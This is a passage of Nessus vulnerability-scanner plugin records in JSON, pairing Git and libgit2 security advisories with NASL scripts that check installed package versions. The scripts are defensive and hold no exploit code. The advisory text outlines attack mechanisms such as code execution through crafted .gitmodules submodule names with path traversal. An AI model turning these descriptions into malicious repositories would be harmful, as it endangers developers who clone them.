value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-el-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-all-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-bzr-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-cvs-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-daemon-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-debuginfo-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-email-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-hg-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-p4-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-svn-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"gitweb-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-SVN-2.14.4-2.58.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:05", "description": "The Git community reports :\n\n- In affected versions of Git, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.\n\n- In affected versions of Git, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name.\nFinally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-04T00:00:00", "type": "nessus", "title": "FreeBSD : Git -- Fix memory out-of-bounds and remote code execution vulnerabilities (CVE-2018-11233 and CVE-2018-11235) (c7a135f4-66a4-11e8-9e63-3085a9a47796)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-10-11T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:git", "p-cpe:/a:freebsd:freebsd:git-lite", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C7A135F466A411E89E633085A9A47796.NASL", "href": "https://www.tenable.com/plugins/nessus/110304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110304);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/11 10:17:50\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"FreeBSD : Git -- Fix memory out-of-bounds and remote code execution vulnerabilities (CVE-2018-11233 and CVE-2018-11235) (c7a135f4-66a4-11e8-9e63-3085a9a47796)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Git community reports :\n\n- In affected versions of Git, code to sanity-check pathnames on NTFS\ncan result in reading out-of-bounds memory.\n\n- In affected versions of Git, remote code execution can occur. With a\ncrafted .gitmodules file, a malicious project can execute an arbitrary\nscript on a machine that runs 'git clone --recurse-submodules' because\nsubmodule 'names' are obtained from this file, and then appended to\n$GIT_DIR/modules, leading to directory traversal with '../' in a name.\nFinally, post-checkout hooks from a submodule are executed, bypassing\nthe intended design in which hooks are not obtained from a remote\nserver.\"\n );\n # https://vuxml.freebsd.org/freebsd/c7a135f4-66a4-11e8-9e63-3085a9a47796.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e1123c96\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:git-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"git<2.13.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.14<2.14.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.15<2.15.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.16<2.16.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.17<2.17.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite<2.13.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.14<2.14.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.15<2.15.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.16<2.16.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.17<2.17.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:51:03", "description": "The version of Atlassian SourceTree installed on the remote host is a version 0.5.1.0 prior to 2.6.9 . It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Atlassian SourceTree 0.5.1.0 < 2.6.9 Remote Code Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-13385", "CVE-2018-13386"], "modified": "2019-11-01T00:00:00", "cpe": ["cpe:/a:atlassian:sourcetree"], "id": "ATLASSIAN_SOURCETREE_2_6_9.NASL", "href": "https://www.tenable.com/plugins/nessus/117406", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117406);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-13385\", \"CVE-2018-13386\");\n script_bugtraq_id(102926);\n script_xref(name:\"IAVA\", value:\"2018-A-0056\");\n\n script_name(english:\"Atlassian SourceTree 0.5.1.0 < 2.6.9 Remote Code Execution Vulnerabilities\");\n script_summary(english:\"Checks the version of Atlassian SourceTree.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian SourceTree installed on the remote host is \naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian SourceTree installed on the remote host\nis a version 0.5.1.0 prior to 2.6.9 . It is, therefore, affected by \nmultiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2018-07-18-953674465.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c961adc1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian SourceTree 2.6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13385\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:sourcetree\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"atlassian_sourcetree_detect.nbin\");\n script_require_keys(\"installed_sw/SourceTree\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\n#atlassian_sourcetree add conversions for b --> beta and a --> alpha\nvcf::atlassian_sourcetree::initialize();\n\napp_info = vcf::get_app_info(app:\"SourceTree\");\n\nconstraints = [{ \"min_version\" : \"0.5.1.0\", \"fixed_version\" : \"2.6.9\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:51:23", "description": "The version of Atlassian SourceTree installed on the remote host is a version 1.0b2 prior to 2.7.6 on Mac OSX. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Atlassian SourceTree 1.0b2 < 2.7.6 Remote Code Execution Vulnerabilities (Mac OSX)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-13385", "CVE-2018-13386"], "modified": "2019-11-01T00:00:00", "cpe": ["cpe:/a:atlassian:sourcetree"], "id": "ATLASSIAN_SOURCETREE_2_7_6_MACOSX.NASL", "href": "https://www.tenable.com/plugins/nessus/117405", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117405);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-13385\", \"CVE-2018-13386\");\n script_bugtraq_id(102926);\n\n script_name(english:\"Atlassian SourceTree 1.0b2 < 2.7.6 Remote Code Execution Vulnerabilities (Mac OSX)\");\n script_summary(english:\"Checks the version of Atlassian SourceTree.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian SourceTree installed on the remote host is \naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian SourceTree installed on the remote host\nis a version 1.0b2 prior to 2.7.6 on Mac OSX. It is, therefore, \naffected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2018-07-18-953674465.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c961adc1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian SourceTree 2.7.6 on Mac OSX or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13385\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:sourcetree\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"atlassian_sourcetree_detect_macosx.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/SourceTree\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"Host/MacOSX/Version\");\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\n#atlassian_sourcetree add conversions for b --> beta and a --> alpha\nvcf::atlassian_sourcetree::initialize();\n\napp_info = vcf::get_app_info(app:\"SourceTree\");\n\nconstraints = [{ \"min_version\" : \"1.0b2\", \"fixed_version\" : \"2.7.6\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T17:54:38", "description": "The remote Debian 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the dla-2936 advisory.\n\n - A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service. (CVE-2018-10887)\n\n - A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service. (CVE-2018-10888)\n\n - In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker can send a crafted smart-protocol ng packet that lacks a '\\0' byte to trigger an out-of-bounds read that leads to DoS. (CVE-2018-15501)\n\n - Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted repository index file. (CVE-2018-8098)\n\n - Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository index file. (CVE-2018-8099)\n\n - A remote code execution vulnerability exists when Git for Visual Studio improperly sanitizes input, aka 'Git for Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1349, CVE-2019-1350, CVE-2019-1354, CVE-2019-1387. (CVE-2019-1352)\n\n - An issue was found in Git before v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2, v2.19.3, v2.18.2, v2.17.3, v2.16.6, v2.15.4, and v2.14.6. When running Git in the Windows Subsystem for Linux (also known as WSL) while accessing a working directory on a regular Windows drive, none of the NTFS protections were active.\n (CVE-2019-1353)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352. (CVE-2020-12278)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353. (CVE-2020-12279)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-21T00:00:00", "type": "nessus", "title": "Debian DLA-2936-1 : libgit2 - LTS security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501", "CVE-2018-8098", "CVE-2018-8099", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2020-12278", "CVE-2020-12279"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libgit2-24", "p-cpe:/a:debian:debian_linux:libgit2-dev", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2936.NASL", "href": "https://www.tenable.com/plugins/nessus/159090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dla-2936. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159090);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2018-8098\",\n \"CVE-2018-8099\",\n \"CVE-2018-10887\",\n \"CVE-2018-10888\",\n \"CVE-2018-15501\",\n \"CVE-2019-1352\",\n \"CVE-2019-1353\",\n \"CVE-2020-12278\",\n \"CVE-2020-12279\"\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0454-S\");\n\n script_name(english:\"Debian DLA-2936-1 : libgit2 - LTS security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the\ndla-2936 advisory.\n\n - A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign\n extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads\n to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak\n memory addresses or cause a Denial of Service. (CVE-2018-10887)\n\n - A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c\n file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to\n cause a Denial of Service. (CVE-2018-10888)\n\n - In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker\n can send a crafted smart-protocol ng packet that lacks a '\\0' byte to trigger an out-of-bounds read that\n leads to DoS. (CVE-2018-15501)\n\n - Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in\n libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted\n repository index file. (CVE-2018-8098)\n\n - Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in\n libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository\n index file. (CVE-2018-8099)\n\n - A remote code execution vulnerability exists when Git for Visual Studio improperly sanitizes input, aka\n 'Git for Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1349,\n CVE-2019-1350, CVE-2019-1354, CVE-2019-1387. (CVE-2019-1352)\n\n - An issue was found in Git before v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2, v2.19.3, v2.18.2, v2.17.3,\n v2.16.6, v2.15.4, and v2.14.6. When running Git in the Windows Subsystem for Linux (also known as WSL)\n while accessing a working directory on a regular Windows drive, none of the NTFS protections were active.\n (CVE-2019-1353)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent\n filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when\n cloning a repository. This issue is similar to CVE-2019-1352. (CVE-2020-12278)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent\n filenames that exist because of NTFS short names. This may allow remote code execution when cloning a\n repository. This issue is similar to CVE-2019-1353. (CVE-2020-12279)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892961\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/libgit2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/lts/security/2022/dla-2936\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-10887\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-10888\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-15501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-8098\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-8099\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2019-1352\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2019-1353\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2020-12278\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2020-12279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/stretch/libgit2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the libgit2 packages.\n\nFor Debian 9 stretch, these problems have been fixed in version 0.25.1+really0.24.6-1+deb9u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1352\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-12279\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 